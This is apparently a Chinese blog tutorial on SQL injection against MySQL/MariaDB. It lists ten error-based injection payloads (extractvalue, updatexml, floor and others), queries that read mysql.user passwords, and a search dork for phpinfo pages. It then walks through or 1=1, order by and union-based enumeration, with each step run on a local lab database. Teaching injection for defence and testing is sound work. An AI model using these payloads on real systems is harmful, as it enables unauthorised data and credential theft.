SQL注入

2023-01-10 20:12:50

SQL注入

SQL常用函数

  • SQL常用函数
    • MID(要截取的字符串,起始位置,结束位置) 截取字符串
    • CHAR(ASCII) 返回ASCII码对应的字符
    • ASCII(字符) 返回字符对应的ASCII码
    • IF(逻辑表达式,返回值1,返回值2) 用于判断
    • SUBSTR(要截取的字符串,起始位置,结束位置) 截取字符串
    • LENGTH(字符串) 返回字符串长度
    • COUT(列名) 返回当前列名下有效记录数
    • SLEEP(s) 静止s秒,数字类型,可自定义
    • # /**/ -- 注释符
    • CONCAT(字符串1,字符串2...) 拼接字符串
    • LOAD_FILE(文件名称) 加载文件
    • INTO OUTFILE '文件名称' 输出

常用十大报错函数

  • floor()

    • select * from test where id=1 and (select 1 from (select count(*), concat(user(), floor(rand(0)*2)) x from information_schema.tables group by x) a);

  • extractvalue()

    • select * from test where id=1 and (extractvalue(1, conact(0x7e, (select user()),0x7e)));

  • updatexml()

    • select * from test where id=1 and (updatexml(1, conact(0x7e, (select user()), 0x7e), 1));

  • geometrycollection()

    • select * from test where id=1 and geometrycollection((select * from (select * from (select user()) a) b));

  • multipoint()

    • select * from test where id=1 and multipoint((select * from (select * from (select user()) a) b));

  • polygon()

    • select * from test where id=1 and polyon((select * from (select * from (select user()) a) b));

  • multipolygon()

    • select * from test where id=1 and multipolygon((select * from (select * from (select user()) a) b));

  • linestring()

    • select * from test where id=1 and linestring((select * from (select * from (select user()) a) b));

  • multilinestring()

    • select * from test where id=1 and multilinestring((select * from (select * from (select user()) a) b));

  • exp()

    • select * from test where id=1 and exp(~(select * from (select user()) a));

MySQL常用函数

  • 查询版本

    • select version();

  • 查询密码

    • select password from mysql.user;

  • 查询所有数据

    • select * from mysql.user;

MySQL数据库配置文件

  • MySQL用户权限

    • information_schema.USER_PRIVILEGES
    • select * from information_schema.USER_PRIVILEGES;

  • MySQL数据库及表的情况

    • information_schema.TABLES
    • select * from information_schema.TABLES;

  • MySQL数据库及表的情况(包含字段)

    • information_schema.COLUMNS
    • select * from information_schema.COLUMNS

SQL注入测试

  • 浏览器中输入

    • inurl:/phpinfo.php

  • SQL注入是如何产生的

    • 这些攻击发生在当不可信的数据作为命令或者查询语句的一部分,被发送给解释器的时候
    • 攻击者发送的恶意数据可以欺骗解释器
    • 以执行计划外的命令或者在未被恰当授权时访问数据

or语句 SQL注入

  • 功能
    • 获取整张表额数据
# 正常查询操作
MariaDB [sel]> select * from grades where name='Sunny';
+-------+------+---------+------+
| name  | sex  | chinese | math |
+-------+------+---------+------+
| Sunny | boy  |      93 |   96 |
+-------+------+---------+------+
# `1 row in set (0.000 sec)`

# SQL注入操作
MariaDB [sel]> select * from grades where name='Sunny' or 1=1;
+-------+------+---------+------+
| name  | sex  | chinese | math |
+-------+------+---------+------+
| Sunny | boy  |      93 |   96 |
| Jerry | boy  |      97 |   91 |
| Marry | girl |      95 |   94 |
| Tommy | boy  |      98 |   94 |
+-------+------+---------+------+
# `4 rows in set (0.001 sec)`

MariaDB [sel]> select * from news where id=0 or 1=1;
+----+----------+--------------------------+------------+
| id | title    | content                  | createtime |
+----+----------+--------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript    | 1607050534 |
|  2 | 基本知识  | 第2章 HTML中的Javascript  | 1607050590 |
|  3 | 基本知识  | 第3章 语言基础            | 1607052573 |
|  4 | 基本知识  | 第4章 变量、作用域和内存   | 1607070553 |
+----+----------+--------------------------+------------+
# `4 rows in set (0.001 sec)`

order by语句 SQL注入

  • 功能
    • 推断表的记录的总量
MariaDB [sel]> select * from news where id=2 order by 5;
# `ERROR 1054 (42S22): Unknown column '5' in 'order clause'`

MariaDB [sel]> select * from news where id=2 order by 4;
+----+----------+--------------------------+------------+
| id | title    | content                  | createtime |
+----+----------+--------------------------+------------+
|  2 | 基本知识  | 第2章 HTML中的Javascript  | 1607050590 |
+----+----------+--------------------------+------------+
# `1 row in set (0.000 sec)`

union语句 SQL注入

  • 功能
    • 推断表的字段的总量
# 正常情况
MariaDB [sel]> select * from news where id=1;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript  | 1607050534 |
+----+----------+------------------------+------------+
# `1 row in set (0.000 sec)`

MariaDB [sel]> select * from news where id=1 union select 0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`

MariaDB [sel]> select * from news where id=1 union select 0,0,0,0;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript  | 1607050534 |
|  0 | 0        | 0                      |          0 |
+----+----------+------------------------+------------+
# `2 rows in set (0.006 sec)`

MariaDB [sel]> select * from news where id=1 union select 0,0,0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`
  • 功能
    • 获取mysql数据
MariaDB [sel]> select * from news where id=1 union select 1,2,host,4 from mysql.user;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript  | 1607050534 |
|  1 | 2        | 127.0.0.1              |          4 |
|  1 | 2        | ::1                    |          4 |
|  1 | 2        | localhost              |          4 |
+----+----------+------------------------+------------+
# `4 rows in set (0.011 sec)`
  • 功能
    • 获取数据库中的所有的数据库名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_schema from information_schema.TABLES;
+----+-------+---------+--------------------+
| id | title | content | createtime         |
+----+-------+---------+--------------------+
|  1 | 2     | 3       | information_schema |
|  1 | 2     | 3       | mysql              |
|  1 | 2     | 3       | performance_schema |
|  1 | 2     | 3       | phpmyadmin         |
|  1 | 2     | 3       | sel                |
|  1 | 2     | 3       | stu                |
+----+-------+---------+--------------------+
# `6 rows in set (0.018 sec)`
  • 功能
    • 获取数据库中的所有的表名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES;
  • 功能
    • 获取某个数据库中的所有的表名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES where table_schema='sel';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
|  1 | 2     | 3       | bank       |
|  1 | 2     | 3       | best       |
|  1 | 2     | 3       | bestmath   |
|  1 | 2     | 3       | grades     |
|  1 | 2     | 3       | news       |
|  1 | 2     | 3       | resume     |
|  1 | 2     | 3       | stu1       |
|  1 | 2     | 3       | stu2       |
+----+-------+---------+------------+
# `8 rows in set (0.012 sec)`
  • 功能
    • 获取某张表中的所有的字段名
MariaDB [sel]> select * from news where id=0 union select 1,2,3,column_name from information_schema.COLUMNS where table_name='news';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
|  1 | 2     | 3       | id         |
|  1 | 2     | 3       | title      |
|  1 | 2     | 3       | content    |
|  1 | 2     | 3       | createtime |
+----+-------+---------+------------+
# `4 rows in set (0.016 sec)`
  • 功能
    • 获取字段内容
MariaDB [sel]> select * from news where id=1 union select 1,2,3,title from sel.news;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript | 1607050534 |
|  1 | 2        | 3                      | 基本知识   |
+----+----------+------------------------+------------+
# `2 rows in set (0.011 sec)`
上一篇:项目管理释放创新变革发展新动能


下一篇:hdu 5310 Souvenir(BestCoder 1st Anniversary ($))